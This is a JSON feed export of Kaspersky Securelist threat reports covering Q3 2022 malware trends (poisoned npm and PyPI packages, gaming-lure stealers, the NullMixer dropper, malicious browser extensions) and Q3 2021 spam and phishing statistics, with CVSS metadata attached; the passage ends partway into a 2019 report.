able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.\n\n### Malicious packages in online code repositories\n\nIn July, we reported a malicious campaign that we named [LofyLife](<https://securelist.com/lofylife-malicious-npm-packages/107014/>). Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.\n\nThe identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The "formatting headlines" package was in Brazilian Portuguese with a "#brazil" hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.\n\nThe packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer \u2013 an open-source malicious script \u2013 and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim's IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim's actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.\n\nThe npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. [This is not the first time we've seen an npm package poisoned in this way](<https://www.kaspersky.com/blog/uaparser-js-infected-versions/42700/>).\n\nnpm is not the only such code repository to have been targeted recently. In August, Check Point [published a report](<https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/>) on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers' personal data and credentials. Following this research, [we discovered two other malicious Python packages in the PyPI](<https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/>), masquerading as one of the most popular open-source packages named "[requests](<https://pypi.org/project/requests/#files>)".\n\nThe attacker used a description of the legitimate "requests" package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics and the project description referenced the web pages of the original "requests" package, as well as the author's email. All mentions of the legitimate package's name were replaced with the name of the malicious one.\n\n### Cyberthreats facing gamers\n\nThe gaming industry is huge and growing. The industry attracts [an audience of more than 3 billion people worldwide](<https://newzoo.com/insights/articles/games-market-engagement-revenues-trends-2020-2023-gaming-report>) \u2013 a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: [the promise of an Android version of a game that's not on Google Play](<https://www.kaspersky.com/blog/fortnite-security/23685/>); [the chance to play games for free](<https://www.kaspersky.com/blog/free-smartphone-games/37303/>); access to game cheats; etc.\n\nWe recently published our [report on gaming-related threats](<https://securelist.com/gaming-related-cyberthreats-2021-2022/107346/>) in 2021\u201322. Here are some of the key headlines:\n\n * In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.\n * The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.\n * The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.\n * Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers' security. In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.\n * Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.\n\nAmong the top threats is RedLine, which we deemed worthy of a [separate report](<https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/>). The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.\n\nThe Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.\n\nRedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs \u2013 useful for cryptocurrency mining.\n\nIn addition to losing sensitive data, the player's reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim's YouTube channel \u2013 the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.\n\n### NullMixer: oodles of Trojans in a single dropper\n\nTrying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.\n\nNullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host "cracks", "keygens" and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23132345/NullMixer_report_01.png>)\n\nWhen someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23170555/NullMixer_report_06.jpg>)\n\nOnce all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.\n\nSince the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.\n\nMany of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in [our report](<https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/>). Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.\n\n### Potential threat in the browser\n\nBrowser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions \u2013 and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.\n\nMalicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google [removed](<https://threatpost.com/google-yanks-106-malicious-chrome-extensions/156731/>) 106 browser extensions from its Chrome Web Store \u2013 all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.\n\nIt's always good to check the permissions an extension requests during installation. And if it's asking for permission to do things that don't seem appropriate, don't install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it's not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to "read and change all your data on the websites you visit". They may really need it in order to function properly, but this permission gives the extension wide powers.\n\nEven if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. To earn more money, some developers [may pass](<https://www.pcworld.com/article/410966/web-of-trust-browser-extensions-yanked-after-proving-untrustworthy.html>) it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.\n\nExtension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.\n\nWe recently published an [overview of the types of threat that mimic useful web-browser extensions and statistics on attacks](<https://securelist.com/threat-in-your-browser-extensions/107181/>), using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.\n\nIn the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent affected by the same threat in the whole of last year.\n\nFrom January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.\n\nThe most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-18T08:00:32", "type": "securelist", "title": "IT threat evolution Q3 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-11882"], "modified": "2022-11-18T08:00:32", "id": "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "href": "https://securelist.com/it-threat-evolution-q3-2022/107957/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing 